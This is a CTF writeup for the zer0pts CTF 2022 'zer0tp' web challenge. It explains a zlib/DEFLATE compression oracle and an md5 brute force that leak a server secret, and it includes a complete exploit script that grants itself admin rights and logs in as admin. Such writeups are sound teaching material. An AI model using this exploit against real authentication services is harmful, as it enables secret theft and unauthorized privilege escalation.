changed 3 years ago
Linked with GitHub

zer0tp - zer0pts CTF 2022

tags: writeup zer0pts CTF 2022 web

Writeups: https://hackmd.io/@ptr-yudai/rJgjygUM9

Overview

Application Overview

[ How does Zer0TP work? ]
+--------+        +-------------+
| Zer0TP |<------>| third party |
+--------+    e   +-------------+
  ^  ^  |            ^
 a| b| c|            |
  |  |  v           d|
+--------+           |
|  user  |-----------+
+--------+

Third party software can use zer0tp as its authentication scheme.
a. The user registers an account on zer0tp
b. User logs in to zer0tp to issue an OTP
c. zer0tp will issue a client token
d. User sends the client token to the third part software
e. Third part software can authenticate the user by the token

Essential Point

Leak the secret:

import os import zlib import base64 import signal import hashlib signal.alarm(30 * 60) secret = base64.b64encode(os.urandom(12)) assert len(secret) == 16 while True: username = input().encode() assert 4 <= len(username) <= 50 id = os.urandom(8).hex().encode() hash = hashlib.md5(id + (zlib.compress(username + secret)[:8])) print(id, hash.hexdigest())

Solution

TL; DR

You can leak the secret from the following:

import os import zlib import base64 secret = base64.b64encode(os.urandom(12)) assert len(secret) == 16 for i in range(1024): username = input().encode() assert 4 <= len(username) <= 50 print(zlib.compress(username + secret)[2])

Summary

You can enforce DEFLATE to compress with the dynamic Huffman codes mode using the well-created username such as de Bruijn Sequence. In this mode, the first byte of the DEFLATE compression (=third byte of the Zlib compression, since the first two bytes are the header) contains the information for the max length of the repeating sequence. Using this, you can extract the keys one by one. You can reverse the md5 in the seconds by brute force using the lack of entropy of the structure of DEFLATE.

Details

This problem is divided into two main parts: the first part is to reverse md5; the second part is to leak the secret using the Zlib compression. For the sake of brevity, we will explain the second part first.

Speed learning: DEFLATE

DEFLATE is the format for the compression. Usually, it forms from multiple blocks, but in the case of this task, you will not see such kind of situation since data is too small. The block has 3 types; Non-compressed, fixed Huffman, and dynamic Huffman. Other than non-compressed block uses the dictionary-based coding, which records the pair of offset and length instead of the actual string. This information is also coded by Huffman code. The actual character of the strings and the length is represented using the same Huffman code.

The following is a pseudo-parser of the part essential for this problem.

res = '' while True: is_final = stream.read_bits(1) block_type = stream.read_bits(2) if block_type == 0b00: ... # Non-compressed blocks (truncated) if block_type == 0b01: ... # Compression with fixed Huffman codes (truncated) if block_type == 0b10: # Compression with dynamic Huffman codes code_for_chrlen_length = stream.read_bits(5) + 257 code_for_distance_length = stream.read_bits(5) + 1 code_for_huffman_length = stream.read_bits(4) + 4 code_for_huffman = [] for i in range(code_for_huffman_length): code_for_huffman.append(stream.read_bits(3)) ... # reading huffman code for the distance and code for the character or length (truncated) while True: # read one symbol from stream using huffman tree symbol = read_symbol(stream, code_for_chrlen) if symbol < 256: res += ord(symbol) # actual character elif symbol == 256: break # end of block (not important) else: assert 257 <= symbol <= 285 # **length is parsed from symbol**, additional information may be provided from stream length = parse_length(symbol, stream) ... # parsing distance and decompress (truncated) if is_final == 0b1: break

You can earn more infomations by looking at RFC1951 - DEFLATE Compressed Data Format Specification version 1.3.

Speed learning: Zlib

Zlib is just the wrapper of DEFLATE. Zlib generated by default zlib.compress has the following format:

  0   1
+---+---+=====================+---+---+---+---+
|CMF|FLG|...compressed data...|    ADLER32    |
+---+---+=====================+---+---+---+---+

quoted from: RFC1950 - ZLIB Compressed Data Format Specification version 3.3

CMF and FLG is always same as long as you are using the default settings. ADLER32 is the checksum.

Second Part

First, consider how to force zlib.compress to use dynamic Huffman mode. To beat the efficiency of fixed Huffman, you need to have a few character types as possible appear in as many as possible with no large repetition. With some experiments, you can find that more than 3 characters of repetition will be compressed. Therefore, we look for the string with the fewest number of characters that appear in a string that has no repetitions of length more than 3. Luckily, this kind of string has a name, which is de Bruijn Sequence. Using this, you can accomplish the goal.

Next, let's find out an oracle that can be used to leak the secret characters one by one. The third byte[1] of compressed data contains the size of the Huffman code for the character and the length. This is 257[2] if there are no repetitions, and more than 258 if there are. Thus, we can detect whether there are repetitions or not. With the observation that more than 3 bytes of repetitions will be compressed, you can leak the entire secret.

import os import zlib import string import base64 SECRET_LEN = 16 secret = base64.b64encode(os.urandom(12)) assert len(secret) == SECRET_LEN def oracle(username): assert 4 <= len(username) <= 50 return zlib.compress(username + secret)[2] # |Σ|=4, n=3 DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5] DE_BRUIJN = b''.join([bytearray([c - ord('0')]) for c in DE_BRUIJN_TEMPLATE]) PREFIX = b'#$' ALPHABET = (string.ascii_letters + string.digits + "+/").encode() init = PREFIX def solve(cur): print(f'[+] {cur=}') if len(cur) - len(init) == SECRET_LEN: return cur[len(init):] res = None for c in ALPHABET: if res is not None: break payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX if (oracle(payload) >> 3) == 0: continue res = solve(cur + bytearray([c])) return res res = solve(init) assert res is not None print(res) assert secret == res

First Part

If we tally up the possible bits of each semantic unit[3] are, we find that there are only about a \(10^6\) possible combinations. With this level of number, we can brute force to reverse the md5.

import os import zlib import string import base64 from hashlib import md5 from itertools import product SECRET_LEN = 16 block_lens = [ 16, # zlib header 1, # bfinal 2, # btypes 5, # code for charactor/length length 5, # code for distance length 4, # code for huffman length *([3] * 10), 1 # for huffman ] assert(sum(block_lens) == 64) blocks = [(l, set()) for l in block_lens] def add_block_info(data): bindata = int.from_bytes(data, "little") def next(n): nonlocal bindata res = bindata & ((1 << n) - 1) bindata >>= n return res for length, cands in blocks: val = next(length) cands.add(val) # |Σ|=4, n=3 DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5] DE_BRUIJN = b''.join([bytearray([c - ord('0')]) for c in DE_BRUIJN_TEMPLATE]) PREFIX = b'#$' ALPHABET = (string.ascii_letters + string.digits + "+/").encode() print("[+] calculating candidates of each blocks...") for i in range(1000): s = base64.b64encode(os.urandom(12)) cur = PREFIX while len(cur) != len(PREFIX + s): for c in ALPHABET: payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX data = zlib.compress(payload + s) add_block_info(data) cur += bytearray([s[len(cur) - len(PREFIX)]]) combs = 1 for _, cands in blocks: combs *= len(cands) print(f"[+] calculated. {combs=}") assert len(blocks[1][1]) == 1 assert len(blocks[2][1]) == 1 prod = list(product(*[[*cands] for _, cands in blocks])) def compute_blocks(salt, hash): for block_vals in prod: data = 0 bit_len = 0 def add(b, len): nonlocal data, bit_len assert b < 2 ** len data += (b << bit_len) bit_len += len for val, length in zip(block_vals, block_lens): add(val, length) assert(bit_len == 64) cur_hash = md5(salt + data.to_bytes(bit_len // 8, "little")).digest() if hash != cur_hash: continue return block_vals assert False CNT = 100 for i in range(100): print(f'[+] testing {i + 1} / {CNT}') secret = base64.b64encode(os.urandom(12)) assert len(secret) == SECRET_LEN salt = os.urandom(16).hex().encode() payload = DE_BRUIJN + secret[10:][:3] + PREFIX hash = md5(salt + zlib.compress(payload + secret)[:8]).digest() compute_blocks(salt, hash)

Exploit

import os from itertools import product from random import shuffle import string import zlib import base64 import requests from hashlib import md5 APP_HOST = os.getenv("APP_HOST", "localhost") APP_PORT = os.getenv("APP_PORT", "8077") ZER0TP_HOST = os.getenv("ZER0TP_HOST", "localhost") ZER0TP_PORT = os.getenv("ZER0TP_PORT", "8080") SECRET_BYTES = 12 SECRET_LEN = len(base64.b64encode(os.urandom(SECRET_BYTES))) # |Σ|=4, n=3 DE_BRUIJN_TEMPLATE = b'000100200301101201302102202303103203311121131221231321332223233300'[:0x30-5] DE_BRUIJN = DE_BRUIJN_TEMPLATE l = list(range(0x20)) shuffle(l) head = l[:4] for i, c in enumerate(head): DE_BRUIJN = DE_BRUIJN.replace(str(i).encode(), bytearray([c])) prev_username = DE_BRUIJN password = 'p4ssw0rd' res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/register', { "username": prev_username, "password": password }).json() assert res["result"] == "OK" print(f'[+] registered as {prev_username}') q = 0 def oracle(query: bytes): global q, prev_username q += 1 assert all(0 <= c < 0x80 for c in query) and len(query) < 50 res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/rename', { "username": prev_username.decode(), "password": password, "new_username": query.decode(), "new_password": password }).json() assert res["result"] == "OK" prev_username = query res = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/login', { "username": query.decode(), "password": password }).json() assert res["result"] == "OK" return res["id"].encode(), bytes.fromhex(res["token"]) block_lens = [ 16, # zlib header 1, # bfinal 2, # btypes 5, # code for character/length length 5, # code for distance length 4, # code for huffman length *([3] * 10), 1 # stager canonical codes ] assert(sum(block_lens) == 64) blocks = [(l, set()) for l in block_lens] def add_block_info(data): bindata = int.from_bytes(data, "little") def next(n): nonlocal bindata res = bindata & ((1 << n) - 1) bindata >>= n return res for length, cands in blocks: val = next(length) cands.add(val) PREFIX = b'#$' ALPHABET = (string.ascii_letters + string.digits + "+/").encode() print("[+] calculating candidates of each blocks...") for i in range(1000): s = base64.b64encode(os.urandom(SECRET_BYTES)) cur = PREFIX while len(cur) != len(PREFIX + s): for c in ALPHABET: payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX data = zlib.compress(payload + s) add_block_info(data) cur += bytearray([s[len(cur) - len(PREFIX)]]) combs = 1 for _, cands in blocks: combs *= len(cands) print(f"[+] calculated.") assert len(blocks[1][1]) == 1 assert len(blocks[2][1]) == 1 prod = list(product(*[[*cands] for _, cands in blocks])) def compute_blocks(salt, hash): for block_vals in prod: data = 0 bit_len = 0 def add(b, len): nonlocal data, bit_len assert b < 2 ** len data += (b << bit_len) bit_len += len for val, length in zip(block_vals, block_lens): add(val, length) assert(bit_len == 64) cur_hash = md5(salt + data.to_bytes(bit_len // 8, "little")).digest() if hash != cur_hash: continue return block_vals assert False DEBUG = True init = PREFIX def solve(cur): print(f'[+] {cur=}') if len(cur) - len(init) == SECRET_LEN: return cur[len(init):] res = None for c in ALPHABET: if res is not None: break payload = DE_BRUIJN + cur[-2:] + bytearray([c]) + PREFIX salt, hash = oracle(payload) if compute_blocks(salt, hash)[3] == 0: continue res = solve(cur + bytearray([c])) return res res = solve(init) assert res is not None response = requests.post(f'http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/set_admin', { "username": prev_username.decode(), "secret": res.decode(), "admin": "1" }).json() print(response) assert response["result"] == "OK" username = base64.b64encode(os.urandom(SECRET_BYTES)).decode() id, token = oracle(username.encode()) s = requests.Session() content = s.post(f'http://{APP_HOST}:{APP_PORT}/login', { "username": username, "id": id, "token": token.hex() }).content print(content) print(content.split(b'<h1>')[1].split(b'</h1>')[0]) print(f'{q=}')

  1. structure of first 3 bytes are: 2 bytes for constant + 1 bit for is_final + 2 bit for block_type + 5 bit for the length of huffman code we need ↩︎

  2. Need to use 256: End of the Block at the end of stream ↩︎

  3. chunks read by read_bits in above pseudo-parser ↩︎

Select a repo